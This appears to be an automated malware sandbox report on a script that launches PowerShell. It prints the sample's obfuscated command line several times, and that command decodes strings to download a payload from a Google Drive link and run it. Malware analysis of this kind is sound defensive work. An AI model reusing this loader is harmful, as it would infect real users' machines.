        Source: Yara matchFile source: 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Nedfldelig72) if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") {
        Suspicious powershell command line found
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejt
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0C90983 push E95B3DD0h; ret 8_2_00007FF7C0C909C9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0C9122D pushad ; retf 8_2_00007FF7C0C91232
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0C900BD pushad ; iretd 8_2_00007FF7C0C900C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0D64DC9 push ebx; ret 8_2_00007FF7C0D64F5A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0D62D30 push eax; retf 8_2_00007FF7C0D62D31
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5544Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4335Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi64_7432.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTR
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#ramphastidae misemphasization truncal overvaere blokdiagram #>;$pyroheliometer='fllesspisninger';<#reform palegold slukningsmaterialerne udrede brugsklare majos coveys #>;$grubbers=$host.privatedata;if ($grubbers) {$mussack++;}function shouse($relativity209){$unsingability=$fertilizations+$relativity209.length-$mussack;for( $iceboats=5;$iceboats -lt $unsingability;$iceboats+=6){$forstaaelsesproces+=$relativity209[$iceboats];}$forstaaelsesproces;}function lnder($stabl){ . ($blyantstifter) ($stabl);}$nyhedens=shouse 'confemskrivoagg az likfi.heyaltekstlbjlkeazeugo/pr he5p lit.kamer0 ndkr prel,(familw pse inedf ntipofdcs reofullywcardosu.gra ovatna.hiltaudio frihe1kirke0bel,a.inter0sho,t;sam,r adrenwtr baiaphetnmulig6,ultr4reser;films manifxgnidn6pro y4se ic;recom musikrelgtyvcredu:jor.a1 hopl2amido1under.wilde0h,pop)ko,ma wifegustyreentracflydek dopyobacks/misfo2 fore0monos1 v go0rorpi0 pis1epi i0vrdi,1resig acraflaconidukkerugen,e villftad oohalmlxitc l/hexac1 rde2trans1aflas. omg,0sca p ';$ddsfjende=shouse ',oggeusm apsentheeoptimr ran-udbinajord g fishewakasn.asuntupgli ';$ornaterne=shouse 'binrvhfod,atmsinktkla,dppsovisp yll:koord/ ult/ fo,sd dispras riiscapevsundhe kims.acoemgcontioresolothr,ugbi delrenoreasers.typhlcshivaopoin,m tryk/aniliusprogc c.ba?photoedemolxf ugtpre olodrukkrstormt,inan=ye lodknub ofnaddwsalnandativl atioo besiaacisdd koll&eksori nonddmono =mobil1per ozlaanej marei eforu bl,dycasuiibesnofbinderelfreksvi.ew atret ndsmpredea shi,yspeak5termo8katarvba lopspild5indv hnab bwv ils7 pancqtestu3untemt cleaqin urzemaljh eleasusp f varma semiwspint ';$citronsommerfuglens=shouse 'polit>h rry ';$blyantstifter=shouse ' eosiilaendesoralx.emig ';$qe='bokset';$iceboatsnformationskanalerne='\maskes.lea';lnder (shouse ',ycon$ nlucgoptaglfejlrocoadmbpat iaprosplinnar:tra,iumienbnpneumsin.erediabearelatsu.aglo thern a,rya g,nbbi dsplvanafen vem= advo$var oewhinsnortopvinko :sk smaprea ps andpd skrd v.isastivstc anga aagn+afs u$ enc.ih,uchceilaieallodbkultuo ti.faacleit ambssatl nnkuwaifsuperorangsrpapism stifa and tak ivich omojagthnansk,sepiklkraptearubatnferleaudkanl ideee nitrrbrutanuncliebo,ep ');lnder (shouse ' spre$t rtigr daklfrifio hjerb p riaunim lfling:nytnkpkontor o.enof ededre raunontakrigsbtstegei nchaooblignmyrmesespiesrubefyudlovspur ottropeefingimu ati= some$ opmao palmrautomn forbapuzzltf rskeinh mr .echnnon hecytop.n.opls sladp f ltl logmigrnsktnring(knag $ unsyc,landiteleft hoorr afdeolifebnp isisinterokomplmst ukmfl,trekadetr dionf b.lyuintergforn,lhepateundernp.ncrsunbaf) kytt ');lnder (shouse 'dtu.k[dilatn turtejordbt.hizo.b blisbegruer.porrc risvdeteriindvecmatereacreapsyen obrn.tiexternba.ret videmkoralaancomnforuda bemag f.oreg,lacrbudbr]lengt:acco,:blunkslavspemika c throuokku,rt.bloiavisbtm croyspilip kragrreserobanneti hosoblomscje,nbo rec,la.loi dompr=gumb livs[uns lnloculearbejt
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#ramphastidae misemphasization truncal overvaere blokdiagram #>;$pyroheliometer='fllesspisninger';<#reform palegold slukningsmaterialerne udrede brugsklare majos coveys #>;$grubbers=$host.privatedata;if ($grubbers) {$mussack++;}function shouse($relativity209){$unsingability=$fertilizations+$relativity209.length-$mussack;for( $iceboats=5;$iceboats -lt $unsingability;$iceboats+=6){$forstaaelsesproces+=$relativity209[$iceboats];}$forstaaelsesproces;}function lnder($stabl){ . ($blyantstifter) ($stabl);}$nyhedens=shouse 'confemskrivoagg az likfi.heyaltekstlbjlkeazeugo/pr he5p lit.kamer0 ndkr prel,(familw pse inedf ntipofdcs reofullywcardosu.gra ovatna.hiltaudio frihe1kirke0bel,a.inter0sho,t;sam,r adrenwtr baiaphetnmulig6,ultr4reser;films manifxgnidn6pro y4se ic;recom musikrelgtyvcredu:jor.a1 hopl2amido1under.wilde0h,pop)ko,ma wifegustyreentracflydek dopyobacks/misfo2 fore0monos1 v go0rorpi0 pis1epi i0vrdi,1resig acraflaconidukkerugen,e villftad oohalmlxitc l/hexac1 rde2trans1aflas. omg,0sca p ';$ddsfjende=shouse ',oggeusm apsentheeoptimr ran-udbinajord g fishewakasn.asuntupgli ';$ornaterne=shouse 'binrvhfod,atmsinktkla,dppsovisp yll:koord/ ult/ fo,sd dispras riiscapevsundhe kims.acoemgcontioresolothr,ugbi delrenoreasers.typhlcshivaopoin,m tryk/aniliusprogc 